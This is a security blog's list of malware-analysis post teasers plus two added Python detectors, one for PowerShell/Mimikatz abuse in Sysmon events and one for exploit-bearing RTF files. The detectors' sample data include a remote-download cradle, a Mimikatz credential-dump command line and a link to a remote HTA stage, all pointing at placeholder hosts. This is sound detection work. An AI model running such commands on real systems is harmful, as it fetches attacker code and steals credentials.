Malicious email campaign mimicking Swiss Financial Institutions: Retefe again.
Yesterday, while I was investigating something else, I ended up with a malicious email impersonating a Swiss bank. The email, with the subject "Von Ihrem Konto ist 78 Franken abgebucht" ("78 francs have been debited from your account"), contains a...
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again...
A few days ago, when I took a look at the latest Retefe campaign affecting Swiss financial institutions, I did not have the time to take a deeper look at the malicious JS embedded in the .docx file. So...
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again...
Following the last two posts, this is a quick update, as I have detected that some new Swiss banks have been added to the list of victims of Retefe (since I last checked, some weeks ago). These are:...
Hunting malicious behaviour abusing PowerShell with Sysmon and Splunk
Sysmon is a monitoring tool which, combined with Splunk, makes an excellent tandem for threat hunting. A good example was presented by Tom Ueltschi at Botconf 2016. Windows PowerShell is a command shell...
Detecting Mimikatz launched by PowerShell
Following my last post about how to hunt for malicious PowerShell commands, I'm interested in detecting Mimikatz once it is launched through PowerShell, for example with the PowerShell Empire framework...
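The Sysmon-plus-Splunk hunting idea behind the two posts above, worked through as an added Python example (not the blog's own Splunk searches and not Tom Ueltschi's material): Sysmon process-creation (Event ID 1) and process-access (Event ID 10) events are modelled as dicts keyed by Sysmon's field names, the sample events are constructed, and the rules are assumed heuristics of the kind a Splunk search would express: stacked stealth launch flags, a decoded -EncodedCommand payload carrying a download cradle, Mimikatz command markers, an Office parent process, and lsass.exe opened with a credential-dump access mask from a call trace containing a module not backed by a file on disk (UNKNOWN). The access-mask list and the flag threshold are assumptions to tune to your environment.

```python
"""Hunt for PowerShell abuse and in-memory Mimikatz in Sysmon events.

Added example, not the blog's own Splunk searches. Events are dicts keyed by
the Sysmon field names (Image, CommandLine, TargetImage, GrantedAccess,
CallTrace); SAMPLE_EVENTS below are constructed, not captured from a host.
"""
import base64
import re

# Launch flags Empire-style one-liners stack together (one alone is common in admin scripts)
STEALTH_FLAGS = re.compile(r"(?i)(?<!\S)-(?:nop\w*|noni\w*|w(?:indowstyle)?\s+hidden|exec\w*\s+bypass)")
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
DOWNLOAD_CRADLE = re.compile(r"(?i)(?:iex|invoke-expression).{0,80}download(?:string|file)")
MIMIKATZ_MARKERS = re.compile(r"(?i)invoke-mimikatz|sekurlsa::|lsadump::|privilege::debug|kerberos::")
# Access masks Mimikatz is known to request on lsass.exe (assumption: tune to your environment)
LSASS_DUMP_MASKS = {"0x1010", "0x1438", "0x143a", "0x1fffff"}
OFFICE_PARENTS = ("\\winword.exe", "\\excel.exe", "\\outlook.exe", "\\powerpnt.exe")


def decode_encoded_command(cmdline):
    """-EncodedCommand is base64 over UTF-16LE; return the script text or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_process_create(ev):
    """Sysmon Event ID 1 (process create): reasons a PowerShell launch looks hostile."""
    reasons = []
    if not ev.get("Image", "").lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return reasons
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    text = cmd if decoded is None else cmd + "\n" + decoded  # hunt in the decoded script too
    if len(STEALTH_FLAGS.findall(cmd)) >= 2:
        reasons.append("stealth launch flags")
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("download cradle")
    if MIMIKATZ_MARKERS.search(text):
        reasons.append("mimikatz marker")
    if ev.get("ParentImage", "").lower().endswith(OFFICE_PARENTS):
        reasons.append("spawned by Office")
    return reasons


def analyse_process_access(ev):
    """Sysmon Event ID 10 (process access): lsass opened the way Mimikatz opens it."""
    reasons = []
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return reasons
    if ev.get("GrantedAccess", "").lower() in LSASS_DUMP_MASKS:
        reasons.append("credential-dump access mask")
    if "UNKNOWN" in ev.get("CallTrace", ""):  # caller not backed by a module on disk
        reasons.append("call trace from unbacked memory")
    return reasons


def hunt(events):
    """Return (index, reasons) for every event that trips at least one rule."""
    checks = {1: analyse_process_create, 10: analyse_process_access}
    hits = []
    for i, ev in enumerate(events):
        reasons = checks.get(ev.get("EventID"), lambda _e: [])(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


def _enc(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events: a benign admin launch, an Office-spawned encoded
# download cradle, a Mimikatz invocation, and two lsass opens (one hostile, one not).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Logs"},
    {"EventID": 1, "Image": PS_EXE,
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "powershell -NoP -NonI -W Hidden -Enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/launcher')")},
    {"EventID": 1, "Image": PS_EXE, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -exec bypass -c \"Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords'\""},
    {"EventID": 10, "SourceImage": PS_EXE, "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+4bf14|UNKNOWN(000001A2B4C00000)"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+4bf14|C:\Windows\System32\KERNELBASE.dll+1f3a0"},
]

if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["EventID"], ", ".join(why))
```

The same logic maps onto Splunk searches over the Sysmon index: the -EncodedCommand decode is the step SPL does not do out of the box, so in practice it lives in a scripted lookup or a post-processing script; the Event ID 10 rule is the piece that still fires when Invoke-Mimikatz is loaded reflectively and never touches disk, which is why the command-line markers alone are not enough.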
Hunting Retefe with Splunk - some interesting points
While I was creating some Splunk use cases to detect malware (together with Sysmon), I was doing some tests with the Retefe malware, which I have written about quite a bit in this blog. There are a couple of...
Retefe hitting MacOSX - Some interesting points
A few weeks ago Check Point posted about a piece of Mac OS X malware, OSX/Dok, which is the version of Retefe ported to Mac OS. Most of the technical aspects of this specimen's behaviour are described in the blog...
Malspam campaign exploiting CVE-2017-0199: a hunting approach
In the last few days I have seen a few malspam emails with RTF files attached. The content of the mails is a fake shipping order with a ZIP attachment containing the malicious RTF file. An example of this...
Analysis of a malicious DOC used by Turla APT group; hunting persistence via...
Yesterday, John Lambert (@JohnLaTwC), from the Microsoft Threat Intelligence Center, tweeted about a malicious document used by the Turla APT group. The malicious document had been in VT for a few hours...
Hunting FIN7 malicious documents
A few days ago I read an interesting post about a new technique that FIN7 threat actors are using to deliver malicious payloads in RTF and DOC files. The detection rate was, in the best case, only...
Hunting APT28 CVE-2017-11292 Flash Vulnerability
Proofpoint made public a couple of days ago that APT28 is using the latest Flash 0-day, CVE-2017-11292, via some malicious weaponized DOC files: APT28 racing to exploit CVE-2017-11292 Flash vulnerability...
Detecting Adwind malware weaponized in MS Office documents
On a daily basis I see a lot of Adwind malware trying to infect end users. Adwind is a multiplatform Remote Access Trojan (RAT) which has been in the wild for some time. In this Kaspersky blog post there is a...
Hunting for Microsoft Equation Vulnerability - CVE-2017-11882
Since Microsoft released the November patches last week, in which CVE-2017-11882 was addressed, I've been trying to get a sample in order to perform some checks for the vulnerability. Today, thanks to Corsin...
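Triage logic for the RTF-borne cases in the posts above (the CVE-2017-0199 malspam with RTF attachments and the hunt for CVE-2017-11882 Equation Editor samples), as an added Python example that is not the blog's code: it parses \objclass and the hex-encoded \objdata of each embedded object, reads the class name out of the OLE1 header itself rather than trusting the RTF control word, and reports three assumed hunting indicators: \objupdate (the object is refreshed on open, the CVE-2017-0199 delivery pattern), an Equation.2/Equation.3 class (an Equation Editor object, the component patched for CVE-2017-11882), and a URL inside the object data. The sample documents are constructed and are not malware.

```python
"""Triage RTF attachments for embedded OLE objects worth a closer look.

Added example, not code from the blog. Sample documents below are
constructed. Indicators are hunting hints, not proof of exploitation:
  * \\objupdate makes Word refresh the object on open, the pattern used by
    CVE-2017-0199 delivery documents to pull a remote payload;
  * an object whose class is Equation.2/Equation.3 is handed to the Equation
    Editor, the component patched for CVE-2017-11882;
  * a URL inside the object data means remote content is being fetched.
"""
import binascii
import re
import struct

OBJ_CLASS_RE = re.compile(rb"\\objclass\s+([^\\{}\s]+)")
OBJ_DATA_RE = re.compile(rb"\\objdata\b([0-9A-Fa-f\s]+)")
URL_RE = re.compile(rb"https?://[^\x00\s\"']+", re.IGNORECASE)
EQUATION_CLASSES = {"Equation.2", "Equation.3"}


def decode_objdata(hex_blob):
    """\\objdata carries the object as hex, usually wrapped across many lines."""
    clean = re.sub(rb"\s+", b"", hex_blob)
    return binascii.unhexlify(clean[: len(clean) & ~1])


def ole1_class_name(obj):
    """Class name from an OLE1 object header, or None if the header does not parse.

    Layout: OLEVersion (4) | FormatID (4: 1 = linked, 2 = embedded) |
            class name length (4) | class name (ANSI, NUL terminated).
    """
    if len(obj) < 12:
        return None
    _version, format_id, name_len = struct.unpack_from("<III", obj, 0)
    if format_id not in (1, 2) or name_len == 0 or 12 + name_len > len(obj):
        return None
    return obj[12:12 + name_len].rstrip(b"\x00").decode("latin-1", "replace")


def scan_rtf(rtf):
    """Return the list of indicators found in one RTF document (bytes)."""
    findings = []
    if b"\\objupdate" in rtf:
        findings.append("objupdate: object refreshes on open (CVE-2017-0199 delivery pattern)")
    for m in OBJ_CLASS_RE.finditer(rtf):
        cls = m.group(1).decode("latin-1", "replace")
        if cls in EQUATION_CLASSES:
            findings.append(f"objclass {cls}: Equation Editor object (CVE-2017-11882 hunting indicator)")
    for m in OBJ_DATA_RE.finditer(rtf):
        obj = decode_objdata(m.group(1))
        cls = ole1_class_name(obj)  # trust the embedded header, not just the control word
        if cls in EQUATION_CLASSES:
            findings.append(f"objdata class {cls}: Equation Editor object (CVE-2017-11882 hunting indicator)")
        for url in URL_RE.findall(obj):
            findings.append("objdata url: " + url.decode("latin-1", "replace"))
    return findings


def build_ole1_hex(class_name, body):
    """Hex of a minimal OLE1 embedded-object header plus body (only to build test data)."""
    name = class_name.encode("ascii") + b"\x00"
    return binascii.hexlify(struct.pack("<III", 0x00000501, 2, len(name)) + name + body)


# Constructed samples: just enough RTF structure to exercise the scanner.
SAMPLE_EQUATION_RTF = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
    + build_ole1_hex("Equation.3", b"\x03\x01\x01\x03\x0a" + b"A" * 16) + b"}}}"
)
SAMPLE_LINK_RTF = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}{\\*\\objdata\n"
    + build_ole1_hex("OLE2Link", b"\x00\x00http://example.invalid/stage2.hta\x00") + b"\n}}}"
)
SAMPLE_CLEAN_RTF = b"{\\rtf1\\ansi Quarterly figures attached.\\par}"

if __name__ == "__main__":
    for name, doc in [("equation", SAMPLE_EQUATION_RTF), ("link", SAMPLE_LINK_RTF), ("clean", SAMPLE_CLEAN_RTF)]:
        print(name, scan_rtf(doc) or ["no indicators"])
```

Objects stored with \bin instead of hex, control words broken up with junk (Word tolerates a lot of garbage inside RTF, which is exactly what the low detection rates in the FIN7 post exploit), and DOC/DOCX containers are outside what this scanner handles; it is a first pass to decide what goes into a sandbox, not a verdict.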
Qrypter Java RAT using Tor
Since the 16th of December, almost on a daily basis, I have been seeing a particular family of Java Remote Access Trojan using Tor. The samples I took a look at are rarely detected by...
Analysis of Adwind embedded in a MS-DOS file
A few days ago there was a malspam campaign mimicking a bank and delivering a PDF file and some DOC files exploiting CVE-2017-11882. The PDF file contains several images and two interesting URLs. The...
Inside Qarallax / Adwind / Qrypter leading to Tesla / HawkEye (part 1)
A few months ago I wrote about a Java RAT named Qrypter (aka QRat or Qarallax), which is basically Adwind with some layers of obfuscation. The post is here. Usually, this RAT is used as the first stage of...
qthelegend: the new Qrypter for Adwind
Since last December, when I blogged for the first time about Qrypter, I've been tracking Adwind malware using this service. @abuse.ch wrote a very interesting post about the providers hosting the C2...
Gozi malspam campaign mimicking Swisscom on 30th July 2018
A few days ago GovCERT.ch reported via Twitter a malspam campaign mimicking Swisscom invoices. The malware delivered in the last stage was Gozi / Ursnif. But let's take a closer look at this...
Hunting malware in memory. A Gozi case.
Some of the actors using Gozi / Ursnif take advantage of compromised email accounts (BEC) to deliver weaponised Microsoft Office documents. This is not new at all; however, in the last week I've seen an...
Knowing your adversaries and their TTPs. The Gozi case
Gozi (aka Ursnif), like many other financial malware families, is used by several different actors operating worldwide. On a daily basis I see Gozi campaigns trying to infect users; however, each campaign has...
Fudcrypt: the service to crypt Java RAT through VBS scripts and Houdini malware
The existence of services to encrypt and obfuscate malware in order to avoid antivirus detection is nothing new at all. In this blog I have written about a couple of services, qthelegend and Qrypter, that...
Unknowncrypter, the crypter twin of Fudcrypt: another Crypter-as-a-Service...
Last week I wrote about a Crypter-as-a-Service named Fudcrypt, which obfuscates Java RATs in VBS scripts. However, this is not the only service being used by threat actors to deliver encrypted Java...
WSH RAT and the link to Unknowncrypter and Fudcrypt
There are plenty of malspam campaigns using the SWIFT "MT103" code to claim some kind of payment. However, recently there was one in particular using some...
WSH RAT - Analysis of the code
Analysis of the code - capabilities of WSH RAT. In the previous post I wrote about the link between WSH RAT and some other crypter services, so in this post I'm going to dig a bit into the analysis of the...
Fudcrypt using H-Worm from WSH RAT
The Fudcrypt builder, like the WSH RAT builder, uses H-Worm. The latest version of the builder, from the 24th of September, provides some interesting insight: in the case of Fudcrypt, compared with WSH RAT, the H-Worm...